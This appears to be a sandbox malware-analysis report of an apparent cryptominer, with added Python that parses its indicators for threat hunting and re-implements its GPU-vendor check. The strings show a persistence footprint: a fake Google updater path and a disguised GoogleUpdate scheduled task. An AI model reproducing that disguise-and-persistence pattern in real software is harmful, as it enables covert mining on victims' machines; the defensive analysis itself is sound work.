                                                                      Total number of Limit Nodes:2

                                                                      Callgraph


                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                      • String ID:
                                                                      • API String ID: 3714283218-0
                                                                      • Opcode ID: f29cc23ca943b4e8fae484110a2de79a05b13f64e9a64d463718a084873ee1c9
                                                                      • Instruction ID: 0b21ca9dcdc46bc7328dac7f2eeae190e5fbc8499ec872ccccf232e6282e1e6c
                                                                      • Opcode Fuzzy Hash: f29cc23ca943b4e8fae484110a2de79a05b13f64e9a64d463718a084873ee1c9
                                                                      • Instruction Fuzzy Hash: D7514C23E3860289FB55BB12E84427DEBA1AF48BA4FA55831D90D473D5FE2CF400C328
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp_wcsnicmpwcslen
                                                                      • String ID: /$0$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$[$\BaseNamedObjects\myfqvfexgknmtduy$\BaseNamedObjects\tuctlojtwqxvvguwxpuyczur$\BaseNamedObjects\wbzsypnzkfn$\Google\Chrome\updater.exe$\Google\Libs\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$eth$xmr
                                                                      • API String ID: 3926934318-1602290141
                                                                      • Opcode ID: 0e6810b932d409e2e9b7040240a4c6d49041b727a79761a6471f3bdabbce411c
                                                                      • Instruction ID: ff384830e25590f4166e67e16a9e1b11754b1cdcc782d0a6867fddb611ab8905
                                                                      • Opcode Fuzzy Hash: 0e6810b932d409e2e9b7040240a4c6d49041b727a79761a6471f3bdabbce411c
                                                                      • Instruction Fuzzy Hash: 91A29D23D3C68294EB21AB15E4453BDEBA1AB94364FE04835C64C076E6FF7DB159C328
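The "String ID" field of the function above is the compact form in which this report lists the wide strings a function references: one line, entries joined with `$`. The entries are the sample's host footprint (three `\BaseNamedObjects` names, the `\Google\Chrome\updater.exe` drop path, the `GoogleUpdateTaskMachineQC` entry under `TaskCache\Tree`, the `PROGRAMFILES=` / `SYSTEMROOT=` environment keys it resolves at run time, and the `cmd.exe`, `reg.exe`, `schtasks.exe`, `powershell.exe` tooling it launches). The following is an added example, not code from the report or from the sample: it parses that field, classifies each entry by its NT-path prefix, and checks a host inventory for matches. `parse_string_id`, `hunt`, `invoked_tools`, `nt_registry_to_hive` and the `SAMPLE_*` inventory are this example's own; the inventory is constructed, and on a live host it would come from the Task Scheduler tree, a file listing and an enumeration of the `\BaseNamedObjects` object directory.

```python
"""Pull host-observable indicators out of a Joe Sandbox "String ID" field.

Added example; not code from the report or the sample. The report renders the
wide strings a function references as one '$'-joined line. This parses that
line, classifies each entry, and checks a (constructed) host inventory.
"""
from dataclasses import dataclass

# Copied verbatim from the "String ID" field of the function above.
STRING_ID = (
    "/$0$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$[$"
    "\\BaseNamedObjects\\myfqvfexgknmtduy$"
    "\\BaseNamedObjects\\tuctlojtwqxvvguwxpuyczur$"
    "\\BaseNamedObjects\\wbzsypnzkfn$"
    "\\Google\\Chrome\\updater.exe$\\Google\\Libs\\$"
    "\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
    "Schedule\\TaskCache\\Tree\\GoogleUpdateTaskMachineQC$"
    "\\System32$\\WindowsPowerShell\\v1.0\\powershell.exe$\\cmd.exe$"
    "\\reg.exe$\\schtasks.exe$eth$xmr"
)

# Binaries the sample launches. They exist on every Windows host, so they are
# context (expected child processes), not files to hunt for.
LOLBINS = {"cmd.exe", "reg.exe", "schtasks.exe", "powershell.exe"}


@dataclass(frozen=True)
class Indicator:
    kind: str   # registry | named_object | file | env | token | noise
    value: str


def parse_string_id(line: str) -> list:
    """Split the '$'-joined field and classify each unique entry.
    Caveat: '$' is the separator, so an entry containing '$' would be split;
    none of the entries on this page do."""
    out, seen = [], set()
    for raw in line.split("$"):
        s = raw.strip()
        if not s or s in seen:          # PROGRAMFILES= is listed twice
            continue
        seen.add(s)
        low = s.lower()
        if low.startswith("\\registry\\machine\\"):
            kind = "registry"
        elif low.startswith("\\basenamedobjects\\"):
            kind = "named_object"
        elif low.startswith("\\"):      # path tail; the env value is prepended at run time
            kind = "file"
        elif s.endswith("="):           # environment-block lookup key ("NAME=")
            kind = "env"
        elif len(s) == 1:               # single characters are usually immediates
            kind = "noise"
        else:
            kind = "token"
        out.append(Indicator(kind, s))
    return out


def nt_registry_to_hive(path: str) -> str:
    """\\Registry\\Machine\\X -> HKLM\\X: the sample uses NT object paths,
    a hunter sees Win32 hive names in reg.exe or Get-Item."""
    prefix = "\\registry\\machine\\"
    if path.lower().startswith(prefix):
        return "HKLM\\" + path[len(prefix):]
    return path


def invoked_tools(indicators) -> list:
    """Well-known binaries the sample references, i.e. expected child processes."""
    names = {i.value.rsplit("\\", 1)[-1].lower() for i in indicators if i.kind == "file"}
    return sorted(names & LOLBINS)


def hunt(indicators, tasks, files, objects) -> dict:
    """Return {indicator: matching inventory entry} for every hit.
    tasks: scheduled-task names (leaves of TaskCache\\Tree); files: full paths;
    objects: names in the \\BaseNamedObjects directory (mutexes, events)."""
    hits = {}
    task_set = {t.lower() for t in tasks}
    obj_set = {o.rsplit("\\", 1)[-1].lower() for o in objects}
    for ind in indicators:
        leaf = ind.value.rstrip("\\").rsplit("\\", 1)[-1].lower()
        tail = ind.value.lower()
        if ind.kind == "registry" and "\\taskcache\\tree\\" in tail:
            if leaf in task_set:
                hits[ind.value] = nt_registry_to_hive(ind.value)
        elif ind.kind == "named_object":
            if leaf in obj_set:
                hits[ind.value] = leaf
        elif ind.kind == "file" and leaf not in LOLBINS:
            if tail.endswith("\\"):      # directory the sample uses
                match = [f for f in files if tail in f.lower()]
            elif tail.endswith(".exe"):  # dropped binary: suffix match on the full path
                match = [f for f in files if f.lower().endswith(tail)]
            else:                        # bare fragment such as \System32
                match = []
            if match:
                hits[ind.value] = match[0]
    return hits


# Constructed host inventory for the demo (not taken from the report).
SAMPLE_TASKS = ["MicrosoftEdgeUpdateTaskMachineCore", "GoogleUpdateTaskMachineQC"]
SAMPLE_FILES = [
    "C:\\Windows\\System32\\cmd.exe",
    "C:\\Program Files\\Google\\Chrome\\updater.exe",
    "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
]
SAMPLE_OBJECTS = ["\\BaseNamedObjects\\SM0:1234:304:WilStaging_02",
                  "\\BaseNamedObjects\\wbzsypnzkfn"]


def demo() -> dict:
    return hunt(parse_string_id(STRING_ID), SAMPLE_TASKS, SAMPLE_FILES, SAMPLE_OBJECTS)


if __name__ == "__main__":
    for ind, where in demo().items():
        print(f"HIT {ind!r} -> {where}")
```

Against the constructed inventory this flags the scheduled task, the `wbzsypnzkfn` named object and the dropped `updater.exe`; the `eth` and `xmr` tokens and the environment keys are kept as classified entries but are not host indicators. The file entries are matched as path suffixes because only the tail is in the binary; the `PROGRAMFILES=` value is resolved at run time, so a hunt must not assume `C:\Program Files`.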
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 139e2274ff43c33dfa5c470873814a5401d4d66c52b76f361c0aac30dcef008a
                                                                      • Instruction ID: c0bde9ff439e72f13e9bccaa0a5feaef270fed47c0ad24d77e3f62addb1ec24c
                                                                      • Opcode Fuzzy Hash: 139e2274ff43c33dfa5c470873814a5401d4d66c52b76f361c0aac30dcef008a
                                                                      • Instruction Fuzzy Hash: 6E51AE47D3D6D149E29279248C7A16CEFD19FA2A317DD447ACA48036D3BA0E3C1AD329
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1cbac0678f4c31276c6e8cfc7a4c0148d61c35e94421a13ea9f3eece4001b650
                                                                      • Instruction ID: 415b9f882188d5ad3faaf230976aa8251a7bbd091ec0b7c3b1e2c449e4c4375c
                                                                      • Opcode Fuzzy Hash: 1cbac0678f4c31276c6e8cfc7a4c0148d61c35e94421a13ea9f3eece4001b650
                                                                      • Instruction Fuzzy Hash: DAE0B6B6A18B84C18614EB52F48005EBB64F7E97C0F50491AFECC53B19CF3CC1A08B40

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph (graph rendering; the block and edge list is not reproduced in text): Function_00007FF7780113B8, basic blocks 7ff7780113b8 to 7ff778011947. Imported calls in the graph: _wcsnicmp at 7ff778011740, 7ff7780117d8 and 7ff77801185d, wcsstr at 7ff778011908. Each _wcsnicmp block has one edge to the common block 7ff778011757 (two calls to 7ff778012fe9, then the exit block 7ff778011934) and one to the next comparison; the wcsstr block leads either to 7ff778011757 or to 7ff77801191b (7ff778012fe9 called there and at 7ff77801192a, then the same exit). Internal callees: 7ff778011335, 7ff77801138a, 7ff7780130f4, 7ff778013103, 7ff77801310f, 7ff778012fe9.
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsnicmp$wcsstr
                                                                      • String ID: 0$@$AMD$ATI$Advanced Micro Devices$NVIDIA$ProviderName$Q$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                      • API String ID: 950242380-3899023574
                                                                      • Opcode ID: 33f0ca916bca0730c1236287edf8c647ae235d183d39f81f72f65ba9d608b99c
                                                                      • Instruction ID: 3a43ba8ad82f1cbacdd438a78054539335e3505d2d0af8bc0fa8a1b72321ccb2
                                                                      • Opcode Fuzzy Hash: 33f0ca916bca0730c1236287edf8c647ae235d183d39f81f72f65ba9d608b99c
                                                                      • Instruction Fuzzy Hash: 85E15F23E3C68294E721AB11E8013AEEBA0EB44764FA05835DA4C47AD5FF7CF155C728
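The strings and APIs of the function at 7ff7780113b8 show what its control-flow graph is doing: it walks the display adapter device class key `{4d36e968-e325-11ce-bfc1-08002be10318}` under `\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\`, reads each adapter's `ProviderName`, and compares it with `_wcsnicmp` and `wcsstr` against `AMD`, `ATI`, `Advanced Micro Devices` and `NVIDIA`. The following is an added example that re-implements that check in Python; it is not code from the sample or from the report. Its assumptions: the three AMD-family strings are matched as case-insensitive prefixes and `NVIDIA` as a case-sensitive substring (the report shows three `_wcsnicmp` sites and one `wcsstr` site but not which string goes to which), the class key has the usual `0000`, `0001`, ... adapter subkeys, and `SAMPLE_SNAPSHOT` is a constructed registry snapshot. What the sample does with the result is not shown on this page; the `eth` and `xmr` strings in the function above are the obvious candidates, but that is an inference.

```python
"""The display-adapter vendor check of the function at 7ff7780113b8, redone in Python.

Added example; not code from the sample or the report. Assumptions: prefix
comparison for the AMD-family strings, substring search for NVIDIA, and the
usual "0000"/"0001" subkey layout of a device class key. SAMPLE_SNAPSHOT is
constructed; on Windows, read_display_providers() reads the live key.
"""
import sys
from typing import Dict, Optional, Set

DISPLAY_CLASS_KEY = (
    "SYSTEM\\CurrentControlSet\\Control\\Class"
    "\\{4d36e968-e325-11ce-bfc1-08002be10318}"
)
# Vendor strings taken from the function's "String ID" field.
AMD_PREFIXES = ("AMD", "ATI", "Advanced Micro Devices")
NVIDIA_SUBSTRING = "NVIDIA"


def wcsnicmp_prefix(value: str, prefix: str) -> bool:
    """_wcsnicmp(value, prefix, wcslen(prefix)) == 0: case-insensitive and
    limited to the prefix length, so "amd radeon" matches "AMD"."""
    return value[:len(prefix)].casefold() == prefix.casefold()


def classify_provider(provider: Optional[str]) -> Optional[str]:
    """One ProviderName -> 'amd', 'nvidia' or None."""
    if not provider:
        return None
    if any(wcsnicmp_prefix(provider, p) for p in AMD_PREFIXES):
        return "amd"
    if NVIDIA_SUBSTRING in provider:    # wcsstr: case-sensitive, anywhere in the string
        return "nvidia"
    return None


def detect_gpu_vendors(adapters: Dict[str, Dict[str, str]]) -> Set[str]:
    """adapters: {subkey: {value name: data}} as read from the class key.
    Returns the set of vendors seen across all adapters."""
    found = set()
    for subkey in sorted(adapters):
        vendor = classify_provider(adapters[subkey].get("ProviderName"))
        if vendor:
            found.add(vendor)
    return found


def read_display_providers() -> Dict[str, Dict[str, str]]:
    """Read the live class key (Windows only) into the dict shape above."""
    if sys.platform != "win32":
        raise OSError("winreg is only available on Windows")
    import winreg
    out = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, DISPLAY_CLASS_KEY) as cls:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(cls, index)
            except OSError:             # ERROR_NO_MORE_ITEMS
                break
            index += 1
            try:
                with winreg.OpenKey(cls, name) as sub:
                    provider, _ = winreg.QueryValueEx(sub, "ProviderName")
                out[name] = {"ProviderName": provider}
            except OSError:             # e.g. the "Properties" subkey, or no ProviderName
                continue
    return out


# Constructed snapshot (not from the report): a VM's basic adapter plus two GPUs.
SAMPLE_SNAPSHOT = {
    "0000": {"ProviderName": "Microsoft",
             "DriverDesc": "Microsoft Basic Display Adapter"},
    "0001": {"ProviderName": "Advanced Micro Devices, Inc.",
             "DriverDesc": "AMD Radeon(TM) Graphics"},
    "0002": {"ProviderName": "NVIDIA",
             "DriverDesc": "NVIDIA GeForce RTX 3060"},
}

if __name__ == "__main__":
    snapshot = read_display_providers() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    print(sorted(detect_gpu_vendors(snapshot)) or "no AMD/NVIDIA adapter")
```

The length-limited `_wcsnicmp` is why real `ProviderName` values such as `Advanced Micro Devices, Inc.` or `ATI Technologies Inc.` match the short constants; a sandbox or VM whose only adapter reports `Microsoft` yields an empty set.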

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$ErrorLastProtectQuery
                                                                      • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                      • API String ID: 637304234-2693646698
                                                                      • Opcode ID: 0294247a2917bbc01cfb82afdaa3ca90372f1be4a342fe6e92584acca44915b7
                                                                      • Instruction ID: 36887513a66ab48f8f867f9bf5791d6aee00ec0440987c9b716bb0d5a30bee2e
                                                                      • Opcode Fuzzy Hash: 0294247a2917bbc01cfb82afdaa3ca90372f1be4a342fe6e92584acca44915b7
                                                                      • Instruction Fuzzy Hash: B831A223F36A0246EA00AB51E88116DEB61EB84BA0BA58935DD0D473D4EE3CF485C358

                                                                      Control-flow Graph

                                                                      control_flow_graph (graph rendering; the block and edge list is not reproduced in text): Function_00007FF778011B49, basic blocks 7ff778011b49 to 7ff77801219d. Entry loop between 7ff778011b99 (call to 7ff7780130d9) and 7ff778011bbf (call to 7ff77801303a); imported calls wcsncmp at 7ff778011cbf and wcslen at 7ff778011ef7; the final block 7ff778011f1c to 7ff77801219d calls 7ff77801138a, 7ff77801303a (twice), 7ff77801307c and 7ff778013055 (twice). Internal callees: 7ff7780130d9, 7ff77801303a, 7ff778013055, 7ff77801308b, 7ff778012d00, 7ff778011335, 7ff778011b25, 7ff77801138a, 7ff778013070, 7ff77801307c.
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: wcslenwcsncmp
                                                                      • String ID: 0$X$`
                                                                      • API String ID: 3763518489-2527496196
                                                                      • Opcode ID: 23562979911c12ef5fce7cf321bc9e9db032968407d02d08a5e491cc9e3985b6
                                                                      • Instruction ID: e69d9e43d7ac096deb9c1e7673eae7fde74149a4290f292685476e42e8f0a451
                                                                      • Opcode Fuzzy Hash: 23562979911c12ef5fce7cf321bc9e9db032968407d02d08a5e491cc9e3985b6
                                                                      • Instruction Fuzzy Hash: 25F18F23A29BC181E7709B15E4403AEFBA0FB847A4F505625DAAC47BD9EF7CE184C714

                                                                      Control-flow Graph

                                                                      control_flow_graph (graph rendering; the block and edge list is not reproduced in text): Function_00007FF7780134EB, basic blocks 7ff7780134eb to 7ff778013755 (the mingw-w64 pseudo-relocation routine, per the strings below). Imported call: VirtualProtect at 7ff778013737, inside the closing loop 7ff77801371c / 7ff778013724 / 7ff778013744 that restores page protections. Internal callees: 7ff778013c04 and 7ff778013d50 at entry; 7ff7780133a4 at 7ff77801359e and 7ff77801362a; 7ff778013340 at 7ff778013676 and 7ff7780136d5, reached from the blocks that reference the three error strings (xrefs 7ff7780135e2, 7ff77801366b, 7ff7780136dd).
                                                                      APIs
                                                                      • VirtualProtect.KERNEL32(?,?,00007FF77801A978,00000000,?,?,?,00007FF77801A970,00007FF778011208,?,?,?,00007FF778011313), ref: 00007FF778013742
                                                                      Strings
                                                                      • Unknown pseudo relocation bit size %d., xrefs: 00007FF77801366B
                                                                      • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7780136DD
                                                                      • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7780135E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                      • API String ID: 544645111-1286557213
                                                                      • Opcode ID: 86afa0e69415522cada0cf88169ad2230cdc9171c62470af168b2c642a5a2027
                                                                      • Instruction ID: a24ffe2a9ff16958761c2defea9fab6ff0499a690e8b5f9a7c37a1f2e1d07300
                                                                      • Opcode Fuzzy Hash: 86afa0e69415522cada0cf88169ad2230cdc9171c62470af168b2c642a5a2027
                                                                      • Instruction Fuzzy Hash: CC619D63F3954285EB10AB15D5402BCFBA0AB40BB8FA68935D91C477D9EE3CF584C728

                                                                      Control-flow Graph

                                                                      control_flow_graph (graph rendering; the block and edge list is not reproduced in text): Function_00007FF7780137A7, basic blocks 7ff7780137a7 to 7ff7780138f7. Imported call signal at 7ff77801385f and 7ff77801387b; internal callee 7ff778013e70 at 7ff778013835.
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: signal
                                                                      • String ID: CCG
                                                                      • API String ID: 1946981877-1584390748
                                                                      • Opcode ID: b79a72abf1adc2578b04b422d0f49005f5e528498582de0c6da89fdd9eb9cf03
                                                                      • Instruction ID: 49f088da51023d15a6ded47fb78a40adb97cf0d4eb24b7e3920b85d62e890d12
                                                                      • Opcode Fuzzy Hash: b79a72abf1adc2578b04b422d0f49005f5e528498582de0c6da89fdd9eb9cf03
                                                                      • Instruction Fuzzy Hash: BF211763E3D34285FA647795D44137DE982AF45374FBA8D36DA0D822D1EE1CB881C329

                                                                      Control-flow Graph

                                                                      control_flow_graph 590 7ff778013250-7ff778013275 591 7ff778013277-7ff778013282 590->591 592 7ff7780132bb-7ff778013329 call 7ff778013dd0 fprintf 590->592 591->592
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-3474627141
                                                                      • Opcode ID: b8492679bac553f1d76b344d5bad17c63bf03d378e5e6c6ad2dd1f1ba9718450
                                                                      • Instruction ID: 08a94a5484a344ba6ec349b5b77e5ed114c1e9cea60bff698d5bb196d8632be7
                                                                      • Opcode Fuzzy Hash: b8492679bac553f1d76b344d5bad17c63bf03d378e5e6c6ad2dd1f1ba9718450
                                                                      • Instruction Fuzzy Hash: 57119122D18E8482D2119F1CE0013AEF370FF9A359F605722EBC8166A4EF3DE552CB04

                                                                      Control-flow Graph

                                                                      control_flow_graph 595 7ff778013287-7ff778013329 call 7ff778013dd0 fprintf
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2713391170
                                                                      • Opcode ID: c25b6fb5ebb498f5d8266f824818b51ef2c0b3c32df58b379e07e913b0188dbc
                                                                      • Instruction ID: bc4b8e38a6f64657e6a781e15871a4fa7999df8af0739cce9540f8cb777b5752
                                                                      • Opcode Fuzzy Hash: c25b6fb5ebb498f5d8266f824818b51ef2c0b3c32df58b379e07e913b0188dbc
                                                                      • Instruction Fuzzy Hash: 51F06227828F8482D2119F18E4002AFF770FF9E799F605726EBC9265A4EF2DE502C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
